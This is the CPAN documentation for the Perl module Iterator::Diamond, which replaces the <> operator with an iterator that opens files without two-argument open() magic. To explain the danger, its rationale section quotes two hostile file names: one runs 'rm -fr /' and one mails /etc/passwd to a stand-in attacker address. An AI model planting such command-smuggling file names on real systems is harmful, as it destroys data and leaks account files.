NAME
Iterator::Diamond - Iterate through the files from ARGV
SYNOPSIS
use Iterator::Diamond;
$input = Iterator::Diamond->new;
while ( <$input> ) {
...
warn("Current file is $ARGV\n");
}
# Alternatively:
while ( $input->has_next ) {
$line = $input->next;
...
}
DESCRIPTION
Iterator::Diamond provides a safe and customizable replacement for the <>
(Diamond) operator.
Just like <>
it returns the records of all files specified in @ARGV
, one by one, as if it were one big happy file. In-place editing of files is also supported. It does use @ARGV
, $ARGV
and ARGVOUT
as documented in perlrun, though without magic.
As opposed to the built-in <>
operator, no magic is applied to the file names unless explicitly requested. This means that you're protected from file names that may wreak havoc to your system when processed through the magic of the two-argument open() that Perl normally uses for <>
.
Iterator::Diamond is based on Iterator::Files.
RATIONALE
Perl has two forms of open(), one with 2 arguments and one with 3 (or more) arguments.
The 2-argument open is magical. It opens a file for reading or writing according to a leading '<' or '>', strips leading and trailing whitespace, starts programs and reads their output, or writes to their input. A filename '-' is taken to be the standard input or output of the program, depending on whether the file is opened for reading or writing.
The 3-argument open is strict. The second argument designates the way the file should be opened, and the third argument contains the file name, taken literally.
Many programs read a series of files whose names are passed as command line argument. The diamond operator makes this very easy:
while ( <> ) {
....
}
The program can then be run as something like
myprog *.txt
Internally, Perl uses the 2-argument open for this.
What's wrong with that?
Well, this goes horribly wrong if you have file names that trigger the magic of Perl's 2-argument open.
For example, if you have a file named ' foo.txt' (note the leading space), running
myprog *.txt
will surprise you with the error message
Can't open foo.txt: No such file or directory
This is still reasonably harmless. But what if you have a file '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're lucky, that is. It can also silently wipe out valuable data.
When your system administrator runs scripts like this, malicous file names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can be a severe threat to your system.
After a long discussion on the perl mailing list it was felt that this security hole should be fixed. Iterator::Diamond does this by providing a decent iterator that behaves just like <>
, but with safe semantics.
If your perl is v5.22 or newer, and your script needs the diamond iterator just inside a while loop condition, you can replace <>
by <<>>
to get similar security. Note, however, that a file name of '-'
can not be interpreted as STDIN with that construct.
FUNCTIONS
new
Constructor. Creates a new iterator.
The iterator can be used by calling its methods, but it can also be used as argument to the readline operator. See the examples in SYNOPSIS.
new takes an optional series of key/value pairs to control the exact way the iterator must behave.
- magic => { none | stdin | all }
-
none
applies three-argument open semantics to all file names and do not use any magic. This is the default behaviour.stdin
is also safe. It applies three-argument open semantics but allows a file name consisting of a single dash-
to mean the standard input of the program. This is often very convenient.all
applies two-argument open semantics. This makes the iteration unsafe again, just like the built-in<>
operator. - edit => suffix
-
Enables in-place editing of files, just as the built-in
<>
operator.Unlike the built-in operator semantics, an empty suffix to discard backup files is not supported.
- use_i_option boolean
-
If set to true, and if edit is not specified, the perl command line option
-i
suffix will be used to enable or disable in-place editing. By default, perl command line options are ignored. - files => aref
-
Use this list of files instead of @ARGV.
If
files
are not specified andstdin
orall
magic is in effect, an empty @ARGV will be treated as a list containing a single dash-
.
next
Method, no arguments.
Returns the next record of the input stream, or undef if the stream is exhausted.
has_next
Method, no arguments.
Returns true if the stream is not exhausted. A subsequent call to next
will return a defined value.
This is the equivalent of the 'eof()' function.
is_eof
Method, no arguments.
Returns true if the current file is exhausted. A subsequent call to next
will open the next file if available and start reading it.
This is the equivalent of the 'eof' function.
current_file
Method, no arguments.
Returns the name of the current file being processed.
GLOBAL VARIABLES
Since Iterator::Diamond is a plug-in replacement for the built-in <>
operator, it uses the same global variables as <>
for the same purposes.
- @ARGV
-
The list of file names to be processed. When a new file is opened, its name is removed from the list.
- $ARGV
-
The name of the file currently being processed. This can also be obtained by using the iterators
current_file
method. - $^I
-
Enables in-place editing and, optionally, designates the backup suffix for edited files. See perlrun for details.
Setting
$^I
to suffix has the same effect as using the Perl command line argument-I
suffix or using theedit=
suffix option to the iterator constructor. - ARGVOUT
-
When in-place editing, this file handle is used to open the new, possibly modified, file to be written. This file handle is select()ed for standard output.
LIMITATIONS
Perl's internal ARGV processing is very magical, and cannot be completely implemented in plain perl. However, the discrepancies should not be noticeable in normal situations.
Even in list context, the iterator <$input>
is currently called only once and with scalar context. This will not work as expected:
my @lines = <$input>;
This reads all remaining lines:
my @lines = $input->readline;
SEE ALSO
Iterator::Files, open() in perlfun, perlopentut, I/O Operators in perlop.
AUTHOR
Johan Vromans, <jv at cpan.org>
BUGS
Please report any bugs or feature requests to bug-iterator-diamond at rt.cpan.org
, or through the web interface at http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Iterator-Diamond. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.
SUPPORT
You can find documentation for this module with the perldoc command.
perldoc Iterator::Diamond
You can also look for information at:
RT: CPAN's request tracker
CPAN Ratings
Search CPAN
ACKNOWLEDGEMENTS
This package was inspired by a most interesting discussion of the perl5-porters mailing list, July 2008, on the topic of the unsafeness of two-argument open() and its use in the <>
operator.
COPYRIGHT & LICENSE
Copyright 2016,2008 Johan Vromans, all rights reserved.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.